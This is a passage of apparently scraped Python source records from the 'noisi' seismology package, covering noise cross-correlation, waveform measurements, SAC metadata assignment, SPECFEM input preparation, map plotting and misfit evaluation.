paths_input(cp,source_conf,step,ignore_network,instaseis):\n \n inf1 = cp[0].split()\n inf2 = cp[1].split()\n \n conf = json.load(open(os.path.join(source_conf['project_path'],'config.json')))\n channel = source_conf['channel']\n \n # station names\n if ignore_network:\n sta1 = \"*.{}..{}\".format(*(inf1[1:2]+[channel]))\n sta2 = \"*.{}..{}\".format(*(inf2[1:2]+[channel]))\n else:\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n\n\n # Wavefield files \n if instaseis == False:\n if source_conf['preprocess_do']:\n dir = os.path.join(source_conf['source_path'],'wavefield_processed')\n \n else:\n dir = conf['wavefield_path']\n \n wf1 = glob(os.path.join(dir,sta1+'.h5'))[0]\n wf2 = glob(os.path.join(dir,sta2+'.h5'))[0]\n else:\n # need to return two receiver coordinate pairs. 
For buried sensors, depth could be used but no elevation is possible, \n \n # so maybe keep everything at 0 m?\n # lists of information directly from the stations.txt file.\n wf1 = inf1\n wf2 = inf2\n\n \n # Starting model for the noise source\n nsrc = os.path.join(source_conf['project_path'],\n source_conf['source_name'],'step_'+str(step),\n 'starting_model.h5')\n\n \n return(wf1,wf2,nsrc)\n \n \ndef path_output(cp,source_conf,step):\n \n\n id1 = cp[0].split()[0]+cp[0].split()[1]\n id2 = cp[1].split()[0]+cp[1].split()[1]\n\n if id1 < id2 :\n inf1 = cp[0].split()\n inf2 = cp[1].split()\n else:\n inf2 = cp[0].split()\n inf1 = cp[1].split()\n\n channel = source_conf['channel']\n sta1 = \"{}.{}..{}\".format(*(inf1[0:2]+[channel]))\n sta2 = \"{}.{}..{}\".format(*(inf2[0:2]+[channel]))\n\n \n corr_trace_name = \"{}--{}.sac\".format(sta1,sta2) \n corr_trace_name = os.path.join(source_conf['source_path'],\n 'step_'+str(step),'corr',\n corr_trace_name) \n\n return corr_trace_name\n \ndef get_ns(wf1,source_conf,insta):\n \n # Nr of time steps in traces\n if insta:\n # get path to instaseis db\n #ToDo: ugly.\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open \n db = instaseis.open_db(dbpath)\n # get a test seismogram to determine...\n stest = db.get_seismograms(source=instaseis.ForceSource(latitude=0.0,\n longitude=0.0),receiver=instaseis.Receiver(latitude=10.,\n longitude=0.0),dt=1./source_conf['sampling_rate'])[0]\n \n nt = stest.stats.npts\n Fs = stest.stats.sampling_rate\n else:\n with WaveField(wf1) as wf1:\n nt = int(wf1.stats['nt'])\n Fs = round(wf1.stats['Fs'],8)\n \n # Necessary length of zero padding for carrying out frequency domain correlations/convolutions\n n = next_fast_len(2*nt-1) \n \n # Number of time steps for synthetic correlation\n n_lag = int(source_conf['max_lag'] * Fs)\n if nt - 2*n_lag <= 0:\n click.secho('Resetting maximum lag to %g seconds: Synthetics are too\\\n short for a maximum lag of %g seconds.' %(nt//2/Fs,n_lag/Fs))\n n_lag = nt // 2\n \n n_corr = 2*n_lag + 1\n \n return nt,n,n_corr,Fs\n \n \ndef g1g2_corr(wf1,wf2,corr_file,src,source_conf,insta):\n \"\"\"\n Compute noise cross-correlations from two .h5 'wavefield' files.\n Noise source distribution and spectrum is given by starting_model.h5\n It is assumed that noise sources are delta-correlated in space.\n \"\"\"\n \n \n #ToDo: check whether to include autocorrs from user (now hardcoded off)\n #ToDo: Parallel loop(s)\n #ToDo tests\n \n\n # Metainformation: Include the reference station names for both stations\n # from wavefield files, if possible. Do not include geographic information\n # from .csv file as this might be error-prone. 
Just add the geographic \n # info later if needed.\n\n with NoiseSource(src) as nsrc:\n\n ntime, n, n_corr, Fs = get_ns(wf1,source_conf,insta)\n\n # use a one-sided taper: The seismogram probably has a non-zero end, \n # being cut off whereever the solver stopped running.\n taper = cosine_taper(ntime,p=0.01)\n taper[0:ntime//2] = 1.0\n ntraces = nsrc.src_loc[0].shape[0]\n print(taper.shape)\n correlation = np.zeros(n_corr)\n\n if insta:\n # open database\n dbpath = json.load(open(os.path.join(source_conf['project_path'],\n 'config.json')))['wavefield_path']\n # open and determine Fs, nt\n db = instaseis.open_db(dbpath)\n # get receiver locations\n lat1 = geograph_to_geocent(float(wf1[2]))\n lon1 = float(wf1[3])\n rec1 = instaseis.Receiver(latitude=lat1,longitude=lon1)\n lat2 = geograph_to_geocent(float(wf2[2]))\n lon2 = float(wf2[3])\n rec2 = instaseis.Receiver(latitude=lat2,longitude=lon2)\n\n else:\n wf1 = WaveField(wf1)\n wf2 = WaveField(wf2)\n\n \n # Loop over source locations\n for i in range(ntraces):\n\n # noise source spectrum at this location\n S = nsrc.get_spect(i)\n \n\n if S.sum() == 0.: \n #If amplitude is 0, continue. (Spectrum has 0 phase anyway. )\n continue\n\n \n if insta:\n # get source locations\n lat_src = geograph_to_geocent(nsrc.src_loc[1,i])\n lon_src = nsrc.src_loc[0,i]\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_r=1.e12)\n \n s1 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n receiver=rec1,\n dt=1./source_conf['sampling_rate'])[0].data*taper)\n s2 = np.ascontiguousarray(db.get_seismograms(source=fsrc,\n receiver=rec2,\n dt=1./source_conf['sampling_rate'])[0].data*taper)\n \n\n else:\n # read Green's functions\n s1 = np.ascontiguousarray(wf1.data[i,:]*taper)\n s2 = np.ascontiguousarray(wf2.data[i,:]*taper)\n \n \n # Fourier transform for greater ease of convolution\n spec1 = np.fft.rfft(s1,n)\n spec2 = np.fft.rfft(s2,n)\n \n # convolve G1G2\n g1g2_tr = np.multiply(np.conjugate(spec1),spec2)\n \n # convolve noise source\n c = np.multiply(g1g2_tr,S)\n \n # transform back \n correlation += my_centered(np.fft.ifftshift(np.fft.irfft(c,n)),\n n_corr) * nsrc.surf_area[i]\n \n # occasional info\n if i%50000 == 0:\n print(\"Finished {} source locations.\".format(i))\n###################### end of loop over all source locations ###################\n\n if not insta:\n wf1.file.close()\n wf2.file.close()\n\n # save output\n trace = Trace()\n trace.stats.sampling_rate = Fs\n trace.data = correlation\n# try to add some meta data\n try:\n sta1 = wf1.stats['reference_station']\n sta2 = wf2.stats['reference_station']\n trace.stats.station = sta1.split('.')[1]\n trace.stats.network = sta1.split('.')[0]\n trace.stats.location = sta1.split('.')[2]\n trace.stats.channel = sta1.split('.')[3]\n trace.stats.sac = {}\n trace.stats.sac['kuser0'] = sta2.split('.')[1]\n trace.stats.sac['kuser1'] = sta2.split('.')[0]\n trace.stats.sac['kuser2'] = sta2.split('.')[2]\n trace.stats.sac['kevnm'] = sta2.split('.')[3]\n except:\n pass\n\n trace.write(filename=corr_file,format='SAC')\n \n\n\ndef run_corr(source_configfile,step,steplengthrun=False,ignore_network=False):\n\n\n # simple embarrassingly parallel run:\n\n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm.Get_rank()\n\n step = int(step)\n\n # get configuration\n source_config=json.load(open(source_configfile))\n obs_only = source_config['model_observed_only']\n insta = json.load(open(os.path.join(source_config['project_path'],\n 'config.json')))['instaseis']\n auto_corr = False # default 
value\n try:\n auto_corr = source_config['get_auto_corr']\n except KeyError:\n pass\n\n # get possible station pairs\n p = define_correlationpairs(source_config['project_path'],\n auto_corr=auto_corr)\n if rank == 0:\n print('Nr all possible correlation pairs %g ' %len(p))\n \n # Remove pairs for which no observation is available\n if obs_only and not steplengthrun:\n directory = os.path.join(source_config['source_path'],'observed_correlations')\n p = rem_no_obs(p,source_config,directory=directory)\n if rank == 0:\n print('Nr correlation pairs after checking available observ. %g ' %len(p))\n if steplengthrun:\n directory = os.path.join(source_config['source_path'],\n 'step_'+str(step),'obs_slt')\n p = rem_no_obs(p,source_config,directory=directory)\n if rank == 0:\n print('Nr correlation pairs after checking available observ. %g ' %len(p))\n\n # Remove pairs that have already been calculated\n p = rem_fin_prs(p,source_config,step)\n if rank == 0:\n print('Nr correlation pairs after checking already calculated ones %g ' %len(p))\n print(16*'*') \n \n\n # The assignment of station pairs should be such that one core has as\n # many occurrences of the same station as possible; \n # this will prevent that many processes try to access the same hdf5 \n # file all at once.\n num_pairs = int( ceil(float(len(p))/float(size)) )\n p_p = p[ rank*num_pairs : rank*num_pairs + num_pairs] \n \n print('Rank number %g' %rank)\n print('working on pair nr. %g to %g of %g.' %(rank*num_pairs,\n rank*num_pairs+num_pairs,len(p)))\n\n for cp in p_p:\n \n # try except is used here because of the massively parallel loop. \n # it needs to tolerate a couple of messups (e.g. a wavefield is \n # requested that isn't in the database)\n # if unknown errors occur and no correlations are computed, comment try-\n # except to see the error messages.\n #try:\n wf1,wf2,src = paths_input(cp,source_config,\n step,ignore_network,insta)\n print(wf1,wf2,src)\n corr = path_output(cp,source_config,step)\n print(corr) \n #except:\n # print('Could not determine correlation for: %s\\\n # \\nCheck if wavefield .h5 file is available.' %cp)\n # continue\n \n if os.path.exists(corr):\n continue\n\n g1g2_corr(wf1,wf2,corr,src,source_config,insta=insta)\n\n return()\n"
},
{
"alpha_fraction": 0.6012781262397766,
"alphanum_fraction": 0.6123923063278198,
"avg_line_length": 27.79199981689453,
"blob_id": "60dc4846c68c8d0db9ddabaed71816e20ebf43e4",
"content_id": "ab654ac599da8590601cf1d1688285d7d97b451b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3599,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 125,
"path": "/noisi/scripts/measurements.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom scipy.signal import hilbert\nfrom math import pi, log\nfrom noisi.util.windows import get_window,my_centered\ntry:\n from noisi.util.plot import plot_window, plot_envelope\nexcept:\n pass\n\n\ndef square_envelope(correlation,g_speed,window_params):\n \n square_envelope = correlation.data**2 + np.imag(hilbert(correlation.data))**2\n if window_params['plot']:\n plot_envelope(correlation,square_envelope)\n \n return square_envelope\n\n\ndef windowed_envelope(correlation,plot=False):\n pass\n\n\ndef windowed_waveform(correlation,g_speed,window_params):\n window = get_window(correlation.stats,g_speed,window_params)\n win = window[0]\n if window[2]:\n win_caus = (correlation.data * win)\n win_acaus = (correlation.data * win[::-1])\n msr = win_caus+win_acaus\n else:\n msr = win-win+np.nan\n return msr\n\n\ndef energy(correlation,g_speed,window_params):\n\n window = get_window(correlation.stats,g_speed,window_params)\n msr = [np.nan,np.nan]\n #if window_params['causal_side']:\n win = window[0]\n #else:\n # win = window[0][::-1]\n if window[2]:\n\n # causal\n E = np.trapz((correlation.data * win)**2)\n msr[0] = E\n if window_params['plot']:\n plot_window(correlation,win,E)\n\n # acausal\n win = win[::-1]\n E = np.trapz((correlation.data * win)**2)\n msr[1] = E\n if window_params['plot']:\n plot_window(correlation,win,E)\n\n return np.array(msr)\n\ndef log_en_ratio(correlation,g_speed,window_params):\n delta = correlation.stats.delta\n window = get_window(correlation.stats,g_speed,window_params)\n win = window[0]\n data = my_centered(correlation.data,correlation.stats.npts)\n\n if window[2]:\n #E_plus = np.trapz((correlation.data * win)**2) * delta\n #E_minus = np.trapz((correlation.data * win[::-1])**2) * delta\n sig_c = correlation.data * win\n sig_a = correlation.data * win[::-1]\n E_plus = np.trapz(np.power(sig_c,2))*delta\n E_minus = np.trapz(np.power(sig_a,2))*delta\n msr = log(E_plus/E_minus)#+np.finfo(E_minus).tiny))\n if window_params['plot']:\n plot_window(correlation,win,msr)\n else:\n msr = np.nan\n return msr\n\n# This is a bit problematic cause here the misfit already needs\n# to be returned (for practical reasons) -- ToDo think about\n# how to organize this better\ndef inst_mf(corr_obs,corr_syn,g_speed,window_params):\n window = get_window(corr_obs.stats,g_speed,window_params)\n win = window[0]\n\n if window[2]:\n\n\n sig1 = corr_obs.data * (win + win[::-1])\n sig2 = corr_syn.data * (win + win[::-1])\n # phase misfit .. try instantaneous phase\n # hilbert gets the analytic signal (only the name is confusing)\n a1 = hilbert(sig1)\n a2 = hilbert(sig2)\n\n cc = a1*np.conjugate(a2)\n\n boxc = np.clip((win + win[::-1]),0,1)\n dphase = 0.5*np.trapz(np.angle(cc * boxc)**2)\n\n if window_params['plot']:\n plot_window(corr_obs,win,dphase)\n else:\n dphase = np.nan\n\n return dphase\n\ndef get_measure_func(mtype):\n\n if mtype == 'ln_energy_ratio':\n func = log_en_ratio\n elif mtype == 'energy_diff':\n func = energy\n elif mtype == 'square_envelope':\n func = square_envelope\n elif mtype == 'windowed_waveform':\n func = windowed_waveform\n elif mtype == 'inst_phase':\n func = inst_mf\n else:\n msg = 'Measurement functional %s not currently implemented.' %mtype\n raise ValueError(msg)\n return func\n"
},
{
"alpha_fraction": 0.5539682507514954,
"alphanum_fraction": 0.6005290746688843,
"avg_line_length": 28.53125,
"blob_id": "0e711934cac2d7153774cf0be9d7a02e7de0bdd8",
"content_id": "f0a1609b0fd010fcbdb74f73666b09e2a9adf760",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1890,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 64,
"path": "/noisi/util/assign_geodata.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom obspy import read\nfrom obspy.geodetics import gps2dist_azimuth\n\nimport sys\nimport os\nfrom glob import glob\n\nindir = sys.argv[1]\nmetafile = sys.argv[2]\n\nprint(indir)\ntraces = glob(indir+'/*.SAC')\ntraces.extend(glob(indir+'/*.sac'))\nprint('Found traces:\\n')\nprint(traces[0])\nprint('...to...')\nprint(traces[-1])\nprint('Assign geographical information.\\n')\n\nmeta = pd.read_csv(metafile)\n\nfor t in traces:\n tr = read(t)\n sta1 = os.path.basename(t).split('.')[1]\n try:\n sta2 = os.path.basename(t).split('--')[1].split('.')[1]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[5]\n print(sta1,sta2)\n lat1 = float(meta[meta['sta']==sta1].iloc[0]['lat'])\n lat2 = float(meta[meta['sta']==sta2].iloc[0]['lat'])\n lon1 = float(meta[meta['sta']==sta1].iloc[0]['lon'])\n lon2 = float(meta[meta['sta']==sta2].iloc[0]['lon'])\n print(lat1,lon1,lat2,lon2)\n \n tr[0].stats.network = os.path.basename(t).split('.')[0]\n tr[0].stats.station = sta1\n tr[0].stats.location = ''\n tr[0].stats.channel = os.path.basename(t).split('.')[3].split('--')[0]\n tr[0].stats.sac.stlo = lon1\n tr[0].stats.sac.stla = lat1\n tr[0].stats.sac.evlo = lon2\n tr[0].stats.sac.evla = lat2\n tr[0].stats.sac.kuser0 = meta[meta['sta']==sta2].iloc[0]['net']\n \n tr[0].stats.sac.kevnm = sta2\n tr[0].stats.sac.kuser1 = ''\n try:\n tr[0].stats.sac.kuser2 = os.path.basename(t).split('--')[1].split('.')[3]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[7]\n tr[0].stats.sac.user0 = 100. \n #print lat1 > -90.\n #print lat1 < 90.\n #print type(lat1)\n #print(float(lat1))\n #print lat1,lon1,lat2,lon2\n geoinf = gps2dist_azimuth(lat1,lon1,lat2,lon2)\n tr[0].stats.sac.dist = geoinf[0]\n tr[0].stats.sac.az = geoinf[1]\n tr[0].stats.sac.baz = geoinf[2]\n\n tr.write(t,format='SAC')\n"
},
{
"alpha_fraction": 0.5217561721801758,
"alphanum_fraction": 0.5582124590873718,
"avg_line_length": 31.64102554321289,
"blob_id": "f3a1d81a21ba45ffbe44552165840429717199a8",
"content_id": "3e5f992fe5f189c7c9ed2ca8c345bc51ac25b3da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2551,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 78,
"path": "/noisi/util/prepare_sem_input.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport json\nimport os\nimport shutil\nimport io\n\ndef grid_to_specfem_stations(grid,spec_dir):\n \"\"\"\n Write noisesource grid to disk as specfem compatible station list.\n \"\"\"\n \n \n fid = open('temp.txt','w')\n for i in range(len(grid[0,:])):\n fid.write('%08g SRC %10.8f %10.8f 0.0 0.0\\n'\\\n %(i,grid[1,i],grid[0,i]))\n \n fid.close()\n \n for dir in os.listdir(spec_dir):\n dst = os.path.join(spec_dir,dir,'DATA','STATIONS')\n print(dst)\n shutil.copy('temp.txt',dst)\n os.remove('temp.txt')\n \ndef stations_to_cmtsolutions(stationlist,hdur,outdir):\n \n\n fid = open(stationlist,'r')\n stationlist = fid.read().split('\\n')\n \n for i in range(len(stationlist)):\n \n station = stationlist[i]\n if station =='': continue\n \n print(station)\n info = station.split()\n \n id = info[0].strip() + '.' + info[1].strip()\n os.mkdir(os.path.join(outdir,id))\n os.mkdir(os.path.join(outdir,id,'DATA'))\n os.mkdir(os.path.join(outdir,id,'OUTPUT_FILES'))\n os.mkdir(os.path.join(outdir,id,'DATABASES_MPI'))\n \n eventfid = open(os.path.join(outdir,id,'DATA','CMTSOLUTION'),'w')\n \n eventfid.write('*** 2000 1 1 1 01 01.00 '+info[3].strip()+\\\n ' '+info[4].strip()+' '+info[5].strip()+' 0.0 0.0 ***\\n')\n eventfid.write('event name: %s \\n' %id)\n eventfid.write('time shift: 0.0000 \\n')\n eventfid.write('half duration: %s \\n' %str(hdur))\n eventfid.write('latitude: %s \\n' %str(info[3].strip()))\n eventfid.write('longitude: %s \\n' %str(info[4].strip()))\n eventfid.write('depth: %s \\n' %str(info[5].strip()))\n eventfid.write('Mrr: 0.0000000 \\n')\n eventfid.write('Mtt: 0.0000000 \\n')\n eventfid.write('Mpp: 0.0000000 \\n')\n eventfid.write('Mrt: 0.0000000 \\n')\n eventfid.write('Mrp: 0.0000000 \\n')\n eventfid.write('Mtp: 0.0000000 ') \n\n\n\ndef prepare_specfem_input(configfile):\n \n with io.open(configfile,'r') as fh:\n config = json.load(fh)\n \n spec_dir = os.path.join(config['project_path'],'specfem_input') \n os.mkdir(spec_dir)\n grid = np.load(os.path.join(config['project_path'],'sourcegrid.npy'))\n stations = os.path.join(config['project_path'],'stations.txt')\n \n \n \n stations_to_cmtsolutions(stations,config[\"hdur_pointsource\"],spec_dir)\n grid_to_specfem_stations(grid,spec_dir)\n \n"
},
{
"alpha_fraction": 0.5642780065536499,
"alphanum_fraction": 0.5927259922027588,
"avg_line_length": 27.482051849365234,
"blob_id": "2804556c7676a1bbb847a8bc2bd8dcda6e780d02",
"content_id": "9f9f129e7ff8065afb28dc883ea62c664367eb55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5554,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 195,
"path": "/noisi/util/plot.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# plotting on the map\nimport matplotlib as mpl\nmpl.rcParams['font.size'] = 14\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nimport matplotlib.tri as tri\nimport numpy as np\nimport time\n\n\ndef plot_grid(map_x,map_y,map_z,stations=[],v=None,globe=False,\n outfile=None,title=None,shade='flat',cmap=None,\n sequential=False,v_min=None,normalize=False,\n coastres='c',proj='cyl',\n lat_0=None,lon_0=None,lonmin=None,lonmax=None,\n latmin=None,latmax=None,mode='interp',resol=1,alpha=1.0):\n\n if lat_0 is None:\n lat_0 = 0.5*(map_y.max()-map_y.min())\n if lon_0 is None:\n lon_0 = 0.5*(map_x.max()-map_x.min())\n\n if lonmin == None:\n lonmin = np.min(map_x)\n if lonmax == None:\n lonmax = np.max(map_x)\n if latmax == None:\n latmax = np.max(map_y)\n if latmin == None:\n latmin = np.min(map_y)\n\n\n if resol != 1:\n map_x = map_x[::resol]\n map_y = map_y[::resol]\n map_z = map_z[::resol]\n\n\n if not proj == 'ortho':\n m = Basemap(rsphere=6378137,resolution=coastres,\n projection=proj,lat_0=lat_0,lon_0=lon_0,\n llcrnrlat=latmin,urcrnrlat=latmax,\n llcrnrlon=lonmin,urcrnrlon=lonmax)\n else:\n m = Basemap(rsphere=6378137,resolution=coastres,\n projection=proj,lat_0=lat_0,lon_0=lon_0)\n\n plt.figure(figsize=(11,9))\n plt.subplot(111)\n\n if title is not None:\n plt.title(title)\n\n\n\n if normalize:\n map_z /= np.max(np.abs(map_z))\n\n\n if v is None:\n v = np.max(map_z)\n\n if sequential:\n cm = plt.cm.magma\n if v_min == None:\n v_min = 0.\n else:\n cm = plt.cm.bwr\n v_min =-v\n\n if cmap is not None:\n cm = cmap\n\n\n\n\n print('max. value on map: %g' %map_z.max())\n if mode == 'interp':\n pass\n # triangulate first, then project,\n # and use plt.tripcolor to put it on the map.\n triangles = tri.Triangulation(map_x,map_y)\n (triangles.x,triangles.y) = m(triangles.x,triangles.y)\n #if it doesn't work, use pcolor mode\n\n plt.tripcolor(triangles,map_z,shading=shade, vmin=v_min,\n vmax=v,cmap=cm,alpha=alpha,linewidth=0.0,edgecolor='none')\n\n cbar = m.colorbar(location='bottom',pad=0.3)\n\n elif mode == 'pcolor':\n mx, my = m(map_x,map_y)\n m.pcolor(mx,my,map_z,cmap=cm,\n tri=True,shading=shade,vmin=v_min,\n vmax=v,alpha=alpha,linewidth=0.,edgecolor='none')\n cbar = m.colorbar(location='bottom',pad=0.3)\n\n\n elif mode == 'srclocs':\n\n indx = map_x % 3 <= 0.5\n map_x = map_x[indx].astype(int)\n map_y = map_y[indx].astype(int)\n\n indy = map_y % 3 <= 0.5\n\n mx,my = m(map_x[indy],map_y[indy])\n m.scatter(mx,my,marker='o',c='0.5',lw=1.,s=np.ones(len(mx))*0.2)\n\n elif mode == 'srcdots':\n\n\n colors = cm(map_z)\n indx = abs(map_z) > 0.4*np.max(map_z)\n sizes = np.ones(len(map_x))*1\n\n mx,my = m(map_x,map_y)\n\n\n #m.scatter(mx[indx],my[indx],marker='o',c=colors[indx],s=sizes[indx])\n scplt = m.scatter(mx,my,marker='o',c=map_z,cmap=cm,s=sizes)\n cbar = m.colorbar(scplt,location='bottom',pad=0.3)\n\n if normalize and v==1.:\n cbar.set_ticks([-1.0,-0.5,0.,0.5,1.0])\n elif normalize and v!=1.:\n cbar.set_ticks([-v,-v/2.,0.,v/2.,v])\n\n\n if globe:\n m.drawcoastlines(linewidth=1.,color='0.5')\n else:\n m.drawcoastlines(linewidth=1.0)\n\n\n if globe:\n #pass\n m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0],color='0.5') # draw parallels\n m.drawmeridians(np.arange(-180,210,60.),labels=[0,0,0,1],color='0.5') # draw meridians\n\n else:\n if not proj == 'ortho':\n d_lon = round(abs(lonmax-lonmin) / 3.)\n d_lat = round(abs(latmax-latmin) / 3.)\n parallels = np.arange(latmin,latmax,d_lat).astype(int)\n meridians = np.arange(lonmin,lonmax,d_lon).astype(int)\n 
m.drawparallels(parallels,labels=[1,0,0,0]) # draw parallels\n m.drawmeridians(meridians,labels=[0,0,0,1])\n\n #draw station locations\n for sta in stations:\n m.plot(sta[0],sta[1],'^',color='r',markersize=7,markeredgecolor='0.5',latlon=True)\n #m.plot(sta[0],sta[1],'^',color='lime',markersize=5,markeredgecolor='0.5',latlon=True)\n if outfile is None:\n plt.show()\n else:\n plt.savefig(outfile,dpi=300.)\n plt.close()\n\ndef plot_sourcegrid(gridpoints,**kwargs):\n\n plt.figure()\n plt.subplot(111)\n m = Basemap(rsphere=6378137,**kwargs)\n m.drawcoastlines()\n\n m.plot(gridpoints[0],gridpoints[1],'go',markersize=10.,latlon=True)\n plt.show()\n\n\ndef plot_window(correlation, window, measurement):\n\n\n maxlag = correlation.stats.npts * correlation.stats.delta\n lag = np.linspace(-maxlag,maxlag,correlation.stats.npts)\n\n plt.plot(lag,correlation.data/np.max(np.abs(correlation.data)))\n plt.plot(lag,window/np.max(np.abs(window)),'--')\n plt.title(correlation.id)\n plt.text(0,-0.75,'Measurement value: %g' %measurement)\n plt.xlabel('Correlation Lag in seconds.')\n plt.ylabel('Normalized correlation and window.')\n\n plt.show()\n\ndef plot_envelope(corr,env):\n max_lag = (corr.stats.npts-1)/2 * corr.stats.delta\n lag = np.linspace(-max_lag,max_lag,corr.stats.npts)\n plt.plot(lag,corr.data/np.max(np.abs(corr.data)),'k')\n plt.plot(lag,env/np.max(np.abs(env)),'r',linewidth=2.)\n plt.grid()\n plt.xlabel('Lag (s)')\n plt.ylabel('Normalized correlation / normalized envelope')\n plt.show()\n"
},
{
"alpha_fraction": 0.6790322661399841,
"alphanum_fraction": 0.6862903237342834,
"avg_line_length": 25.36170196533203,
"blob_id": "5db7a76161fbf568ff6597ab2f0a5167ea4f1382",
"content_id": "9f591b23ab0ed0be0b34cee6d67c03277677199d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1240,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 47,
"path": "/noisi/util/evaluate_misfit.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import sys\nfrom pandas import read_csv\nimport json\nimport os\nimport numpy as np\nfrom glob import glob\n\n# evaluate measurement\nsource_dir = sys.argv[1]\nstep = sys.argv[2]\n\n# get weights for freq. bands\nmeasr_config = json.load(open(os.path.join(source_dir,\n\t'measr_config.json')))\nweights = measr_config['weights']\nmtype = measr_config['mtype']\n\n# for each freq. band,...\nstep_tests = glob(os.path.join(source_dir,'step_'+step,'steptest_*'))\n\nresult = np.zeros((len(step_tests),2))\n\nfor i in range(len(step_tests)):\n\tfor j in range(len(weights)):\n\t\t# what step length?\n\t\tresult[i,0]=(float(step_tests[i].split('_')[-1]))\n\n\t\t# load the measurements\n\t\tfilename = '{}.{}.measurement.csv'.format(mtype,j)\n\t\tmsr_file = os.path.join(step_tests[i],filename)\n\t\tdat = read_csv(msr_file)\n\n\t\n\t\t# take the average\n\t\tresult[i,1] += dat.l2_norm.mean()/len(weights) * weights[j]\n\n\nnp.save('result_step_length_test.npy',result)\n\n# Read misfit of previous step and print that\nmf = 0\nfor j in range(len(weights)):\n\tfilename = '{}.{}.measurement.csv'.format(mtype,j)\n\tmsr_file = os.path.join(source_dir,'step_'+step,filename)\n\tdat = read_csv(msr_file)\n\tmf += dat.l2_norm.mean()/len(weights) * weights[j]\nprint(\"Average misfit of all frequency bands: %g\" %mf)\n\n"
},
{
"alpha_fraction": 0.6829559206962585,
"alphanum_fraction": 0.711561381816864,
"avg_line_length": 31.269229888916016,
"blob_id": "18c55cb8ef594209ba49ebddde239884253f12e1",
"content_id": "8206ae2a230810e1edb25ca153c81936cbe8ea7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 839,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 26,
"path": "/noisi/test/test_adjoint.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nfrom obspy import read\n\ndef test_adjoint():\n\t# copy the correlation\n\tos.mkdir('test/testdata/testsrc/step_0/corr')\n\tos.system('cp test/testdata/testsrc/step_0/corr_archived/*.sac \\\n\t\ttest/testdata/testsrc/step_0/corr/')\n\tos.mkdir('test/testdata/testsrc/step_0/adjt/')\n\n\t# run forward model\n\tos.system('noisi measurement test/testdata/testsrc/ 0')\n\n\t# assert the results are the same\n\t# ToDo: path\n\t\n\ttr1 = read('test/testdata/testsrc/step_0/adjt/NET.STA1..CHA--NET.STA2..CHA.0.sac')[0]\n\ttr2 = read('test/testdata/testsrc/step_0/adjt_archived/NET.STA1..CHA--NET.STA2..CHA.0.sac')[0]\n\t\n\tassert (tr1.data == tr2.data).sum() == len(tr2.data)\n\tassert tr1.stats.sampling_rate == tr2.stats.sampling_rate\n\t\n\t\n\t# remove stuff\n\tos.system('rm -rf test/testdata/testsrc/step_0/corr/')\n\tos.system('rm -rf test/testdata/testsrc/step_0/adjt/')\n"
},
{
"alpha_fraction": 0.6256560683250427,
"alphanum_fraction": 0.6339919567108154,
"avg_line_length": 30.12980842590332,
"blob_id": "d58fc2b3dbe60ebf67b2bf9e6bd776a9d3663bb5",
"content_id": "16ba339105fe7ff7abd327228cd90ebf908e67f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6478,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 208,
"path": "/noisi/scripts/assemble_gradient.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport os\nimport json\nfrom glob import glob\nfrom math import isnan\nfrom noisi import NoiseSource\ntry:\t\n\tfrom noisi.util.plot import plot_grid\nexcept:\n\tpass\nfrom warnings import warn\n\ndef assemble_ascent_dir(source_model,step,snr_min,n_min,save_all=False,\n\tnormalize_gradient=False):\n\n# where is the measurement database located?\n\tsource_config=json.load(open(source_model))\n\tdatadir = os.path.join(source_config['source_path'],'step_' + str(step))\n\toutfile\t= os.path.join(datadir,'grad','grad_info.txt')\n\tif os.path.exists(outfile):\n\t\tos.system('rm '+outfile)\n\n# Figure out how many spectral basis functions there are:\n\twith NoiseSource(os.path.join(datadir,'starting_model.h5')) as nsrc:\n\t\tn_basis = nsrc.spect_basis.shape[0]\n\n\n# allocate the kernel array\n\tgrd = np.load(os.path.join(source_config['project_path'],'sourcegrid.npy'))\n\n\tgradient = np.zeros((n_basis,np.shape(grd)[1]))\n\n# get the predefined weights\n\tmeasr_config = json.load(open(os.path.join(source_config['source_path'],\\\n\t\t'measr_config.json')))\n\tm_type = measr_config['mtype']\n\ttry:\n\t\tvar_weights = measr_config['weights']\n\texcept KeyError:\n\t\tvar_weights = np.ones(n_basis)\n\n\n# Loop over basis functions\n\n\tfor ix_basis in range(n_basis):\n\n\t\tmsrfile = os.path.join(datadir,\"{}.{}.measurement.csv\".\\\n\t\t\tformat(measr_config['mtype'],ix_basis))\n\n\n\n\t# 